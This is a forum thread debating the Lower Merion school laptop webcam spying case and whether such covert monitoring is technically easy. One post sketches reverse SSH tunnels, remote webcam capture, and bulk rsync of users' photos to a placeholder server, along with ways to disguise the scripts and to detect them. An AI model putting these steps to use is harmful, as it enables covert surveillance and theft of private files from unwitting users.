Anyone involved in signing off on the installation of such software needs to be busted down to food service ... for farm animals.

After they get out of prison.

I wasn't equating wealth with virtue. I mentioned the school system's affluence to counter suggestions that the system in place couldn't be sophisticated or custom-installed by professionals.

I wasn't equating wealth with virtue. I mentioned the school system's affluence to counter suggestions that the system in place couldn't be sophisticated or custom-installed by professionals.


You don't seem to be referring to the post of yours I quoted. It mentioned nothing about wealth, and neither did I. Perhaps you are thinking of a later post of yours, and not the one I responded to.

Yes, we're guessing at the technical details, but so what?

Is there really any question that what is being described overall is possible? The important question here isn't how they did it precisely, but what they did and why. ...and really more the what.

Did the laptop take a picture of a student unknowingly in his home? Did the school direct the laptop to take that picture (either in real time or as some sort of cron job) without a legitimate reason to do so? Did that picture end up back in the school's possession without the student's knowledge or permission?

If the answer is "yes" to all those questions, the school is screwed. It doesn't matter if you don't understand how it could have possibly happened.

WTF is your problem? I never said I didn't "understand how it could have possibly happened." I said the story is still not fitting together for me yet, especially in regards to the one image that is claimed to be evidence of spying. There can be any number of answers to the questions you asked, but they alone don't explain the story of the administrator and the image.

As for whether what happened is possible, I have contended from day one that the elaborate system described in the lawsuit was possible but very unlikely and that something far less sophisticated, however, would be easy.

Removed breach of Rule 12

WTF is your problem? I never said I didn't "understand how it could have possibly happened." I said the story is still not fitting together for me yet, especially in regards to the one image that is claimed to be evidence of spying. There can be any number of answers to the questions you asked, but they alone don't explain the story of the administrator and the image.

As for whether what happened is possible, I have contended from day one that the elaborate system described in the lawsuit was possible but very unlikely and that something far less sophisticated, however, would be easy.

I explained it quite directly. I even explained that the "elaborate system" isn't unlikely at all.

ETA: In fact, on a mac, it's not even software to install (except possibly a script to activate the webcam from the command line (http://www.intergalactic.de/pages/iSight.html)). After that it is bash/applescript and cron to schedule it to run as a root process. Hell name it something like ksyslogd2 and googling that name would give something similar to a legit UNIX process. If the user didn't have root access, they'd never know. As for everything else it is claimed to do: All of that can be done with tools provided under the hood of OS X and scripts. I can tell you from experience of doing exactly this it wouldn't cause stress on system process load and since it's all outbound connections you don't have an issue with home firewalls unless someone's tweaked their router.

Yes, we're guessing at the technical details, but so what?
<snip>
If the answer is "yes" to all those questions, the school is screwed. It doesn't matter if you don't understand how it could have possibly happened.



WTF is your problem? I never said I didn't "understand how it could have possibly happened." I said the story is still not fitting together for me yet, especially in regards to the one image that is claimed to be evidence of spying. There can be any number of answers to the questions you asked, but they alone don't explain the story of the administrator and the image.

As for whether what happened is possible, I have contended from day one that the elaborate system described in the lawsuit was possible but very unlikely and that something far less sophisticated, however, would be easy.


In one of your first posts in this thread you said ...

<snip>
I challenge you or anyone else to produce examples of off-the-shelf software that allows a central computer to surreptitiously track and control webcams on multiple computers. I'm tech savvy, and I'm telling you that I have never seen any off-the-shelf software that does what is described in the filing. I could write such a program, but that means that the school would have to pay for custom software.

The significance of this is that such a software request would not be cheap, and it would be become widely known in the school district. It's just one more piece of evidence that says this story is most likely ********:
<snip>


I think it is reasonable to consider the OS that the laptop shipped with and open-source freeware as either "off-the-shelf" or "cheap"

Ducky shared with us that not only are simple open source programs specifically intended for such tasks freely available on the net, but that a proficient UNIX sysadmin with root access could write their own scripts to perform such a function without difficulty, and this would not be easily apparent to the average user.

<snip important body of text. Good stuff if you missed this post.>

So the idea that the type of software described in the article doesn't even exist is dead wrong. The idea it would be difficult or expensive to implement is dead wrong. The idea that anyone with the know how at the school could access it is very plausible.

As SonOfLaertes pointed out...

<snip>
Lower Merion is a very wealthy school district, many of its students come from the "Main Line" (watch the movie "The Philadelphia Story" to get a sense of the Main Line). Many of it's students go on to attend Ivy League colleges. So I guess my point is that this is a school district with a lot of money; I'm quite sure that their IT and administrative staff is top-notch, the best money can buy.
<snip>


So, making allowances for modest and restrained hyperbole I can understand how Upchurch came to the conclusion he did about your lack of understanding. I had the same impression myself.

In one of your first posts in this thread you said ...

I think it is reasonable to consider the OS that the laptop shipped with and open-source freeware as either "off-the-shelf" or "cheap"

Ducky shared with us that not only are simple open source programs specifically intended for such tasks freely available on the net, but that a proficient UNIX sysadmin with root access could write their own scripts to perform such a function without difficulty, and this would not be easily apparent to the average user.

I'm very well of what I said. I went on to clarify that I was talking about everything claimed in the lawsuit. What Ducky describes and what we have later learned is nowhere near what is claimed in the lawsuit. Furthermore, as I have pointed out already, there is a difference between "not apparent to the average user" and being so hidden that not a single nosy teenager was able to spot this software that is allegedly being used to spy on people.

So, making allowances for modest and restrained hyperbole I can understand how Upchurch came to the conclusion he did about your lack of understanding. I had the same impression myself.
It sounds to me like somebody who didn't read the full text of the lawsuit and who didn't read my posts in their entirety is trying to tell me what I did or did not understand.

To quote myself:
Read the frigging lawsuit. It talks about how clandestine and powerful this "spying" software is. I'm saying that nothing like this exists commercially, so that makes it even less likely that what they claim actually exists. In rebuttal I'm having people tell me, "Well, there's some software that does some of what is claimed. It's installed just like ordinary software, so anybody can see it."

Of course, none of these technical issues have any direct bearing on why the administrator would be pointing to an image stored locally on the student's laptop. That just strikes me as odd as does why the administrator would be talking to the student about inappropriate behavior at home in the first place. It's entirely plausible that the image in question is totally unrelated to the ability of the school to activate the webcams remotely. For example, the student could have been "in trouble" over something else, and the administrator confiscated the laptop. While examining the laptop, she saw some questionable images. Then, through further conversation, this security feature is mentioned. It doesn't mean that it was used to acquire the image. It doesn't mean it wasn't, which is why I say I find it confusing.

If you read the lawsuit carefully, it does not allege that the image in question was captured at the request of school system nor does it allege that the student denies any knowledge of how the image was acquired (meaning he could have simply taken it himself). It doesn't describe how the administrator knew the image was on the laptop. I find this puzzling.

I'm very well of what I said. I went on to clarify that I was talking about everything claimed in the lawsuit. What Ducky describes and what we have later learned is nowhere near what is claimed in the lawsuit. Furthermore, as I have pointed out already, there is a difference between "not apparent to the average user" and being so hidden that not a single nosy teenager was able to spot this software that is allegedly being used to spy on people.


It sounds to me like somebody who didn't read the full text of the lawsuit and who didn't read my posts in their entirety is trying to tell me what I did or did not understand.

To quote myself:


Of course, none of these technical issues have any direct bearing on why the administrator would be pointing to an image stored locally on the student's laptop. That just strikes me as odd as does why the administrator would be talking to the student about inappropriate behavior at home in the first place. It's entirely plausible that the image in question is totally unrelated to the ability of the school to activate the webcams remotely. For example, the student could have been "in trouble" over something else, and the administrator confiscated the laptop. While examining the laptop, she saw some questionable images. Then, through further conversation, this security feature is mentioned. It doesn't mean that it was used to acquire the image. It doesn't mean it wasn't, which is why I say I find it confusing.

If you read the lawsuit carefully, it does not allege that the image in question was captured at the request of school system nor does it allege that the student denies any knowledge of how the image was acquired (meaning he could have simply taken it himself). It doesn't describe how the administrator knew the image was on the laptop. I find this puzzling.

That's a nice side step away from the technical discussion and your own words about the accessibility and cost effectiveness of what the school's technical support staff could do remotely.

So by your answer here do I take it you're rescinding the following statement of yours?

I challenge you or anyone else to produce examples of off-the-shelf software that allows a central computer to surreptitiously track and control webcams on multiple computers. I'm tech savvy, and I'm telling you that I have never seen any off-the-shelf software that does what is described in the filing. I could write such a program, but that means that the school would have to pay for custom software.

Bold mine.

I've not only shown off the shelf software that does it, I showed the school wouldn't have to pay for that software (only the tech support admin's salary to implement it.) I also showed it could be construed as surreptitious and hidden from the user.

Tell you what, you name the requirements you think the lawsuit's description requires of the software and I will show with step-by-step instructions exactly how to do it with existing software freely available to the public. I'll even write the scripts involved to automate it and post them here for others to peer review. Since we know the school's laptops are macs I'll tailor what I do to that, however the OS has little bearing on the general concepts I will show. It could be done on any operating system. It also can be done without regard to whether the laptop is connected to the school's network.

I do not guarantee it will be the same as how the school does it, as in UNIX there are 1500 ways to awk your cat, but I will demonstrate one way to do it. I will even give my hours put into creating the system and normal hourly billing rate for services to show how much it would cost in man hours.

I'll even help out by providing relevant descriptions from the lawsuit documents:

http://forums.randi.org/picture.php?albumid=299&pictureid=2438

Which is descriptive in saying not only does the webcam need to be remote controlled but any other data available to the operating system needs to be accessible remotely to a school administrator.

Shall I put together the post documenting how easy and cheap it is to do that for a whole fleet of laptops running OS X?

Or would you prefer to admit your technical assessment of the software as described in the OP article and the PDF of the lawsuit was uninformed?

Although a tiny green diode lights up when the MacBook's iSight camera, mounted just above the screen, is recording, school administrators allegedly warned about a bug - well-documented online by other MacBook users - that made the light come on randomly.
http://www.philly.com/philly/business/technology/20100219_Remotely_accessing_a_laptop_is_fairly_eas y.html

http://www.philly.com/philly/business/technology/20100219_Remotely_accessing_a_laptop_is_fairly_eas y.html

This is pretty good evidence they were intentionally hiding their activity to surreptitiously take pictures/monitor students.

<snip>

I've not only shown off the shelf software that does it, I showed the school wouldn't have to pay for that software (only the tech support admin's salary to implement it.) I also showed it could be construed as surreptitious and hidden from the user.

Tell you what, you name the requirements you think the lawsuit's description requires of the software and I will show with step-by-step instructions exactly how to do it with existing software freely available to the public. I'll even write the scripts involved to automate it and post them here for others to peer review. Since we know the school's laptops are macs I'll tailor what I do to that, however the OS has little bearing on the general concepts I will show. It could be done on any operating system. It also can be done without regard to whether the laptop is connected to the school's network.

I do not guarantee it will be the same as how the school does it, as in UNIX there are 1500 ways to awk your cat, but I will demonstrate one way to do it. I will even give my hours put into creating the system and normal hourly billing rate for services to show how much it would cost in man hours.

<snip>

Leaving aside the pleasure of poking UncaYimmy (which I am guilty of sharing :blush:) this brings up a couple of questions I'd like for you to offer an opinion on.

One of the skepticism's mentioned in this thread so far is that a school full of computer savvy students would not go for very long without being aware of such function being implemented on these school supplied computers. I'm not quite so certain about that. My experiences with users (going back to the early 80's) is that most own only the very minimum of technical knowledge required to perform whatever tasks they are interested in, and no more, if even that much. I would suspect that only the usual vanishingly small percentage of "techno-geeks" would be apt to stumble across scripts in the root code and understand what they were for.

It occurred to me that the normal reaction in such a case would not be to spread the word, but rather to see if they could hack the system and take advantage of the opportunity to use the feature themselves.

Where I'm going with this is wondering if there might be a "tip of the iceberg" sort of situation, where far more "unauthorized users" than a rogue assistant principal could be involved. That could become very embarrassing, and is at the core of my belief that the problem is not how such a system is being used, but that it is being implemented at all.

Another thought relates to your offer to UncaYimmy of providing an example of such an implementation. I think it would be beneficial for such examples to be widely broadcast along with simple step-by-step instructions for non-techies to be able to check their own computers and identify whether or not such processes were installed there. Maybe even with some fixes. You mentioned something about router settings in an earlier post which might be useful to the less adept, by way of example.

I have to think that this instance is probably not isolated, and that other schools and perhaps even businesses may be running scared. Their first instincts are going to be to try to suppress and minimize. An open air educational campaign could be very enlightening.

Leaving aside the pleasure of poking UncaYimmy (which I am guilty of sharing :blush:) this brings up a couple of questions I'd like for you to offer an opinion on.

One of the skepticism's mentioned in this thread so far is that a school full of computer savvy students would not go for very long without being aware of such function being implemented on these school supplied computers. I'm not quite so certain about that. My experiences with users (going back to the early 80's) is that most own only the very minimum of technical knowledge required to perform whatever tasks they are interested in, and no more, if even that much. I would suspect that only the usual vanishingly small percentage of "techno-geeks" would be apt to stumble across scripts in the root code and understand what they were for.

It occurred to me that the normal reaction in such a case would not be to spread the word, but rather to see if they could hack the system and take advantage of the opportunity to use the feature themselves.

Where I'm going with this is wondering if there might be a "tip of the iceberg" sort of situation, where far more "unauthorized users" than a rogue assistant principal could be involved. That could become very embarrassing, and is at the core of my belief that the problem is not how such a system is being used, but that it is being implemented at all.

Another thought relates to your offer to UncaYimmy of providing an example of such an implementation. I think it would be beneficial for such examples to be widely broadcast along with simple step-by-step instructions for non-techies to be able to check their own computers and identify whether or not such processes were installed there. Maybe even with some fixes. You mentioned something about router settings in an earlier post which might be useful to the less adept, by way of example.

I have to think that this instance is probably not isolated, and that other schools and perhaps even businesses may be running scared. Their first instincts are going to be to try to suppress and minimize. An open air educational campaign could be very enlightening.

Well....Sure. let me state directly that I am not posting this to encourage any illegal actions or activities. This is purely a deomnstrational post on administrative functions.

So I don't know exactly how the school did it, but here's some quick notes on how it could be done, along with ways to check your own mac for issues like this:

Firstly, were I the administrator I would have a puiblic accessible return path for a remote protocol. In this case I'll choose ssh, as it's built in to OS X (and unix/linux) and is easy to script.

So imagine from the public domain, and the internal network I have server1.schooldomain.edu that ran an SSH service I could come back to. With internal DNS on the school network, and external DNS for elsewhere then any ssh traffic pointed at that server would hit correctly. Knowing that, I would also make sure a fleet of laptops would have numeric and incremental hostnames. On Macs, your hostname is name.local so in this case the hostname would be 123456.local. I do this to correlate connections and data as I will demonstrate later.

From there I would do the following before it even got to the student's hands:

set numeric hostname:

1) Open a Terminal window and enter the following commands pressing "enter" after each one.
2) sudo hostname your-host-name-here
3) sudo scutil --set LocalHostName $(hostname)
4) sudo scutil --set HostName $(hostname)

Create startup scripts for laptop:

http://oreilly.com/pub/a/mac/2003/10/21/startup.html

Once that is done, create ssh keys to use passwordless authentication for scripting:

http://developer.apple.com/mac/library/DOCUMENTATION/Darwin/Reference/ManPages/man1/ssh-keygen.1.html

http://www.cyberciti.biz/tips/ssh-public-key-based-authentication-how-to.html

this means when I put the authorized_keys file and ssh keys in root's home directory (technically ~/.ssh/authorized_keys ) I can ssh back and forth between the laptop and the server with no need for a password authentication.

Then I would have a script that would do the following when a network connection is detected:

##get host name:

$port=echo $HOSTNAME | sed -e 's/.local*//'

##sh tunnel back to school server (to be done when network connection is detected):

ssh -R $port:localhost:22 user@schoolnetwork.edu 'ping -s yahoo.com'

The above creates a connection on the server that can be accessed by doing the following:

ssh root@localhost:$port (which would be the same as the hostname of the computer.) The ping command piped in is to ensure the connection stays active. It's a dirty hack way of doing it, but I'm pretty much just pulling this off the top of my head right now.

now that we have the connection, we place the script to activate the webcam:

found here: http://www.intergalactic.de/pages/iSight.html

rsync isightcapture.script root@localhost:/bin/ -p $port

now that it's in place, log in and capture:

ssh root@localhost:$port

(bash prompt)$ ./premadescript.sh

Which would contain the following types of things:

set date:

$date = date +%Y%M%H%M%S

get host name:

$port=echo $HOSTNAME | sed -e 's/.local*//'

/bin/isightcapture $port.$date.jpg

send it (and all others) home:

scp $port.*.jpg user@schooldomain.edu:~/

Want to search their user directory for porn? Ok.

Pictures first:

declare -a array
array=($(find /Users -name *.jpg))

send them back to the school's server, rate limited to avoid overloading network connections:

rsync -a --bwlimit=20 $array user@schooldomain.edu:~/$port.pics/

The same could be done with any file extension: .mkv .avi etc. Find commands are processor intense sometimes, so you can renice it to avoid stepping on running processes:

http://en.wikipedia.org/wiki/Nice_%28Unix%29

Or, you could just remotely execute a backup of their whole home directory. here's some instructions on scripting that:

http://www.linux.com/archive/feed/121604

On a funny side note, you want the mac to speak directly to the student in a creepy voice? log in and execute this command remotely:

(bash prompt)$ say "Big Brother is watching you."

On OS X that executes the speech synthesis module of the OS and speaks the words in quotes. Mac users out there: open a terminal from Applications/Utilities/Terminal.app and try it out.

The above is a very informal mix of bash script language and regular notes on my part. not to be taken as a working script.

So how do you test to see if you have these processes running?

Open a terminal and check for ssh traffic:

(bash prompt)$ netstat -tap

This will also show if you are connected to the school's server by hostname or IP. You could, if only IP's are shown, use the host command to see who it is:

host 123.456.789.101

Or you could use lsof to see if root is doing anything to your home directory, and by what process then google for the process. I am assuming the student doesn't have root access or I would suggest using dtrace to see what those processes are doing.

Unprivileged users can't read root's home directory, but if you have sudo (a command to execute things as root from your own account) you could do a find for ssh host keys:

sudo find / -name *.rsa

or

sudo find / -name *.dsa

Conversely, blocking outgoing traffic on essential service ports on your home router may help, but if you are at a coffee house, that's probably not going to work. If you're logged in as a user, you theoretically can change the firewall settings on your mac in the control panel without root privileges. I haven't tested that one yet tho.

So let's see, I wasted about 40 minutes typing this instead of the actual scripts, which would be roughly the same time. Set up per laptop would be half an hour to an hour (let's say an hour for billing purposes) per laptop as they came in and went out to students, and maybe an hour to set up all the scripts server-side to one-line command the functions I want to do. That's a static time bill of 2-3 hours and 1 hour per laptop at 200/hr (my rate, a tape-monkey admin with minimal scripting skills would be much less, say 50/hr generously.) Grand total for it would be my salary for whatever time spent. If I am smart, I automate the setup process for the policies and scripts needed on the laptop and I can do 100 at a time connected to the network at school.

To fix for the user, since you have physical control, you could use a boot disk to mount the hard drive from a live CD, and remove the scripts/ssh keys in root's home directory. Instructions here:

http://www.bootdisk.com/
http://www.insanelymac.com/forum/index.php?showtopic=54376\

For more ideas, check this link for forensic analysis of a compromised unix/linux server:

http://blog.larsstrand.org//article.php?story=HollidayCracking

Did I leave anything out?

<snip>

Did I leave anything out?


Seems pretty complete to me.

Many thanks.

Do you think it's unreasonable to consider the OS that ships with a consumer laptop to be "off-the-shelf software"?

This sort of FUBAR was probably inevitable once laptops with built in webcam, microphone and wifi became ubiquitous. I have a suspicion that similar situations will be surfacing RSN.

What do you think?

Left this out:

The one thing I couldn't hide easily is the green light that pops on when the cam is activated. However, as was noted earlier, the school district actually took pains to disguise that light coming on under the assumption that it was a bug in the OS of the laptops. (http://forums.randi.org/showthread.php?postid=5640180#post5640180)

This to me answers the idea that it was knowing activity and intended to be hidden from students. I'd say that answers the quotient of whether this was indended to be masked, and thusly could be used (and was) for spying.

Seems pretty complete to me.

Many thanks.

Do you think it's unreasonable to consider the OS that ships with a consumer laptop to be "off-the-shelf software"?

This sort of FUBAR was probably inevitable once laptops with built in webcam, microphone and wifi became ubiquitous. I have a suspicion that similar situations will be surfacing RSN.

What do you think?


I'd say the OS that ships with the laptop is surely off the shelf. If it's accessible when you buy the thing, then it's accessible to anyone who owns the same OS. That's off the shelf to me. I should point out, however, that the tools I showed above are part of the GNU tool set and freely download-able whether you have OS X or not. with cygwin, they even run on windows machines (with the exception of the isightcapture script. That's specific to the macs, but once you have the driver software for the webcam, you can make a script that does the same thing in windows.)

To be fair: In a corporate environment using these types of tactics (though not with webcams to watch things) has been the norm for a long time. Corporate laptops have long been given to workers with the ability for the company to remotely access it. That part isn't much different from what the school district did. What's different is that the school district is in a very different legal stance than a company is.

http://www.philly.com/philly/business/technology/20100219_Remotely_accessing_a_laptop_is_fairly_eas y.html

edited to remove comment


ETA: The title of the article is "Remotely accessing a laptop is fairly easy"

I predict a small uproar among parents and privacy advocates, followed by manufactures finally putting shutters on the damn things.

I predict a small uproar among parents and privacy advocates, followed by manufactures finally putting shutters on the damn things.
Or one could use this piece of modern technology:

http://forums.randi.org/picture.php?albumid=237&pictureid=2442

Or one could use this piece of modern technology:

http://forums.randi.org/picture.php?albumid=237&pictureid=2442
.
The News last night mentioned that "work around" was being used. :)

- snip -
One of the skepticism's mentioned in this thread so far is that a school full of computer savvy students would not go for very long without being aware of such function being implemented on these school supplied computers. I'm not quite so certain about that.
- snip -


quadraginta, you may well be right. I haven't heard any evidence that the students were aware of the spycam/spyware system before the Vice Princifool staged his confrontation.

However, I find that puzzling. Lower Merion is a large school system, with a high percentage of students who are tech-savvy well beyond their years. We know that some of them were covering up the web-cam with post-it notes, so they obviously suspected that they might be watched. Personally I find it hard to believe that suspicious students would not have sniffed this out.

I can buy the possibility that a few might have kept that knowledge to themselves in order to try a little spying of their own on their classmates; but I think an equal number would taken the opportunity to be the hero and spread the word.

Perhaps Ducky or someone else more tech savvy than I am can answer the question - could a simple native scripted solution as Ducky outlined be hidden from determined students? Or would it take more professional third party software? It seems to me that even third party software would show telltale extraneous CPU activity.

Perhaps Ducky or someone else more tech savvy than I am can answer the question - could a simple native scripted solution as Ducky outlined be hidden from determined students? Or would it take more professional third party software? It seems to me that even third party software would show telltale extraneous CPU activity.

It's easier to hack people than computers. Why hack a password when you can just get the person to tell you it? Likewise, you don't have to hide anything from the students, only lie about the source of the activity.

could a simple native scripted solution as Ducky outlined be hidden from determined students? Or would it take more professional third party software? It seems to me that even third party software would show telltale extraneous CPU activity.I understand that it is possible to have spyware that does not show up in the task or process manager, and starts without any apparent traces, and can remotely get a webcam to record without even having the record led on. It does require software from dubious sources.

quadraginta, you may well be right. I haven't heard any evidence that the students were aware of the spycam/spyware system before the Vice Princifool staged his confrontation.

However, I find that puzzling. Lower Merion is a large school system, with a high percentage of students who are tech-savvy well beyond their years. We know that some of them were covering up the web-cam with post-it notes, so they obviously suspected that they might be watched. Personally I find it hard to believe that suspicious students would not have sniffed this out.

I can buy the possibility that a few might have kept that knowledge to themselves in order to try a little spying of their own on their classmates; but I think an equal number would taken the opportunity to be the hero and spread the word.

Perhaps Ducky or someone else more tech savvy than I am can answer the question - could a simple native scripted solution as Ducky outlined be hidden from determined students? Or would it take more professional third party software? It seems to me that even third party software would show telltale extraneous CPU activity.

If you have root, anything is possible.

My answer above takes into account students looking. If the students didn't have privileged accounts, they would have a hard time finding it. You could name your scripts the same as legitimate unix processes and it would be very difficult to detect.

The last link in my how-to has (http://blog.larsstrand.org//article.php?story=HollidayCracking) a link to a forensic analysis of a compromised linux server in the wild. The tactics behind that and behind hiding monitoring software like we're describing here are pretty much the same (except the school had root by legally owning the device and having a sysadmin work on it, not by hacking their way in through privilege escalation.)

In that last link you can see tactics on how to hide the processes from a user, even one that has root!

Let's not also forget the school explained the light going on next to the webcam as a software bug - and it's a believable one because similar bugs do exist in the wild. Even tech savvy kids could be fooled with that dodge. That's a pretty sophisticated explanation to dodge why the webcam goes off.

Source:

http://forums.randi.org/showthread.php?postid=5640180#post5640180

Basically, the possibility of a child changing clothes in front of the webcam should have been reason enough not to have this feature. Regardless of what you catch the student doing, if you record several minutes or hours of them changing, you are in the big trouble, dude.

Also, why should students have to use tape to prevent school administrators from committing a crime, violating their privacy, etc., etc.?

Perhaps Ducky or someone else more tech savvy than I am can answer the question - could a simple native scripted solution as Ducky outlined be hidden from determined students? Or would it take more professional third party software? It seems to me that even third party software would show telltale extraneous CPU activity.

http://www.consumerist.com/2007/07/video-consumerist-catches-geek-squad-stealing-porn-from-customers-computer.html

This is an example of someone doing practically the same thing to catch Geek Squad computer techs stealing pictures from a customer computer. The computer tech had no clue. I've done something similar to catch employees who I knew were surfing porn-- there's really not much work involved in keeping it surreptitious.

Honestly, with root/admin access, there's very little that can't be done by the administrators regardless of operating system.

(Snip...)
Did I leave anything out?
Yeah.

You setup the first one, then you duplicate it on all the other laptops with a script set to execute on the first reboot that renames the computer and logs the new name and the mac address of the NIC to a server in the school.

Schools (and other corporate environments) tend to work that way. They don't leave whatever was on the laptop as delivered, they build one the way they like it and duplicate them.

Your work time in setting up the system amotizes itself pretty quickly when you do thousands.

Yeah.

You setup the first one, then you duplicate it on all the other laptops with a script set to execute on the first reboot that renames the computer and logs the new name and the mac address of the NIC to a server in the school.

Schools (and other corporate environments) tend to work that way. They don't leave whatever was on the laptop as delivered, they build one the way they like it and duplicate them.

Your work time in setting up the system amotizes itself pretty quickly when you do thousands.

Sure. I was approaching it if someone came late to the game of these macs being out there and had to convert.

You're right, new acquisitions would be cloned this way.

I'm tech savvy,
Obviously not. :newlol :newlol

But Macs are so secure and are NEVER hacked or stolen from! How could this happen on Mac?

But Macs are so secure and are NEVER hacked or stolen from! How could this happen on Mac?
Steve Jobs actually uses this feature to ensure customer loyalty. A pic or 2 of the customer in a compromising position and they'll buy a Mac again unless they want those pics on the internet. :D

I'm pretty disappointed that there are members here who are asserting, without evidence, that the kid in the lawsuit is just faking it to hide their own activity.

If you just look up youtube "teacher webcam laptop spying" you can see the assistant principal from this story demonstrate for the video camera, that yes, they school can activate the camera remotely, without consent, without student knowledge, and he even says he can do it when the student is at home.

He even likes to snap pictures to scare the students. The students are unaware they are being watched until their laptop makes a shutter sound.

He does this for fun, people. For fun.

"For fun."
Some get their jollies riding around town, slingshotting ball bearings at store front windows.
It's only for fun.
Gollee!
Can't a pervert sneak a peek at the kiddies when he wants to?
What is this country coming to?

I'm pretty disappointed that there are members here who are asserting, without evidence, that the kid in the lawsuit is just faking it to hide their own activity.

If you just look up youtube "teacher webcam laptop spying" you can see the assistant principal from this story demonstrate for the video camera, that yes, they school can activate the camera remotely, without consent, without student knowledge, and he even says he can do it when the student is at home.

He even likes to snap pictures to scare the students. The students are unaware they are being watched until their laptop makes a shutter sound.

He does this for fun, people. For fun.
So much for "we only use it to recover stolen laptops". Game, set, match. That douchebag is toast.

Vza_bMuy42M

Now onto the conspiracy value of this story....

What kid eats Mike & Ike(Mikes & Ikes) nowadays? Was the kid tech savvy and knew that Mr. Peepers would think he was popping pills.


I sure hope so.

So much for "we only use it to recover stolen laptops". Game, set, match. That douchebag is toast.

Vza_bMuy42M

Is YouTube now liable for allowing the posting of videos of minors without their consent?

So much for "we only use it to recover stolen laptops". Game, set, match. That douchebag is toast.

Vza_bMuy42MIt's from the PBS Frontline: Digital Nation (http://video.pbs.org/video/1402987791/). I just watched it and I thought of this thread. It is a different school though, and in the video there is no spying of kids at home. I hope this school doesn't do that, though it shows would not be technically difficult to do so.

I've not only shown off the shelf software that does it, I showed the school wouldn't have to pay for that software (only the tech support admin's salary to implement it.) I also showed it could be construed as surreptitious and hidden from the user.

Any version of Windows since XP has that functionality built in. It's called "Remote Administrator", is enabled by default, and can easily be configured and accessed in a way that is completely invisible to the end user.

As for locating the laptop in the cloud, there are any number of third-party VPN applications that automatically contact to the administrator's network on startup. My employer uses one such application from Cisco on our work laptops.

I heard about this because my nephew will be enrolled at that high school starting in September. I didn't know it was national news!

How sad is it that my first thought reading this article was, "What the hell school has the money to buy its students each laptops?!" This wasn't a private or preperatory school, was it? Yeah, the invasion of privacy here is completely outstanding on a WTF level. I can't speak to the technology aspect of it, but from a legal aspect, I was under the impression that video and/or audio (or pictures) taken without the subject's consent were not admissable in a court as evidence. So even if the kid was doing something legitimately illegal, would the school even have had a leg to stand on with its "evidence"?

I heard about this because my nephew will be enrolled at that high school starting in September. I didn't know it was national news!

Is it, or just big news on this Forum?

Is it, or just big news on this Forum?
It's been on the Google News front page for several days, until today.

Is it, or just big news on this Forum?
.
It's been a feature on the evening news several days out here.

Here's (http://www.computerworld.com/s/article/9160278/Software_maker_blasts_vigilantism_in_Pa._school_sp ying_case?taxonomyId=12) an update on the "off-the-shelf" nature of the sowtware involved.



Software maker blasts 'vigilantism' in Pa. school spying case

The company selling the software used by a Pennsylvania school district to allegedly spy on its students blasted what it called laptop theft-recovery "vigilantism" today.

Absolute Software said it dissuades users of theft-recovery software from acting on their own. "We discourage any customer from taking theft recovery into their own hands," said Stephen Midgley, the company's head of marketing, in an interview Monday. "That's best left in the hands of professionals."

Midgley confirmed that Lower Merion School District of Ardmore, Pa. was running Absolute Manage, formerly known as LANRev, which Absolute Software acquired last December. The suburban Philadelphia school district purchased and deployed LANRev prior to Absolute's acquisition, he said, noting that most school districts buy the software for power management features that let IT staff remotely power down systems.

Calling LANRev a "legacy" product, Midgley also said that Absolute would ship an update in the next several weeks that will permanently disable Theft Track, the name of the feature that lets administrators switch on a laptop's camera to take photographs of a potential thief after the computer is reported stolen

Is it, or just big news on this Forum?
.
It's been a feature on the evening news several days out here.


Montgomery County DA is involved. FBI is too. (http://www.reuters.com/article/idUSTRE61L5R520100222)

PHILADELPHIA (Reuters) - Federal prosecutors and the FBI on Monday said they would join a probe into whether a Philadelphia-area school district spied on students using remotely controlled cameras in school-issued laptops.



ACLU is watching. EFF, etc., etc.

It's got pretty good legs so far.

Here's (http://www.computerworld.com/s/article/9160278/Software_maker_blasts_vigilantism_in_Pa._school_sp ying_case?taxonomyId=12) an update on the "off-the-shelf" nature of the sowtware involved.


This is far more elaborate than what I put together, but the function is similar. It's designed for quiet back-end processing of centrally managed jobs. Patch updates, data recovery, etc.

This not only does everything UY listed he thought was impossible, it does not appear to be very intrusive to standard users at all.

Per their own website on the software:

Gather hundreds of hardware and software data points from devices over the network. Display data with custom views, searches and reports and export that data into various file formats. Integrate asset information into third party applications such as Microsoft SCCM and Web Help Desk.

Centrally manage and install patches – tracking and reporting on the patch status of all managed systems, as well as automatically adding required updates and patches.


Track installed applications and licenses on all of the devices in your deployment. Collect data from each machine so you can intelligently manage application licenses to avoid over-install penalties. Stay ahead of regulatory non-compliance by locating, terminating, and removing unlicensed and unauthorized software. Repackage software installations and deploy software in native installer formats.

And the best part (bold mine):

Enjoy the ease of a single interface to manage all of your IT assets within the Absolute Customer Center (regardless if a device is on or off your company network). You can monitor changes in asset information including user identification, physical location, and the installation of software/hardware that may not comply with government and corporate regulations. Absolute Track includes advanced reporting capabilities.

Geotechnology
Use GPS or Wi-Fi technology to track your assets on an internet map. You will be able to see current and historical locations within about 33 feet. Visit the Geolocation Technologies & Devices page for more information.

Absolute Customer Center
The Absolute Customer Center is the hub of our technology. It is an intuitive, web-based user interface where you can manage all of your IT assets, allowing you to easily identify any that have gone missing, enforce software policies, and maintain a fleet of optimally running devices. You will have easy access to reports, maps, dashboards, and management features specific to your deployment. View the demo for more information.

Source:

http://www.absolute.com/products

So...

Here it is, UY. And to recap, here's your words again (boldings mine):

Personally, I don't believe the story is accurate. In order for this to work, the computer would have to have some custom software on it When the computer connected to the Internet, it would then have to connect to Central Computer (school office?) to say, "Here I am!" I'm not aware of any off-the-shelf software that does that.


I challenge you or anyone else to produce examples of off-the-shelf software that allows a central computer to surreptitiously track and control webcams on multiple computers. I'm tech savvy, and I'm telling you that I have never seen any off-the-shelf software that does what is described in the filing. I could write such a program, but that means that the school would have to pay for custom software.

Remote access when connected to the school network, yes. Once you connect to some other network (home), the school doesn't know where the laptop is unless it "phones home" so to speak. Then it's subject to the firewall restrictions. Sure, you could use something like www.LogMeIn.com, but that's hardly surreptitious.

Surreptitious: obtained, done, made, etc., by stealth; secret or unauthorized; clandestine

I don't see that this software operates that way.

There are other things in the lawsuit that I assume are the result of the lawyer not understanding technology. It says that the "webcam can be activated remotely at any time" by the school district. Well, short of radio transmitters in the laptop, this ain't gonna happen. The machine at least needs to be on and connected to the Internet. It says that the school district has the "ability to capture webcam images from any location where the laptop is kept." Again, untrue short of some CIA-type electronics.

If I wanted to be pedantic, I would point to all these things as further evidence that such software is not commercially available. But I'm not. I'm actually giving them the benefit of the doubt, but I'm only willing to bend so far.

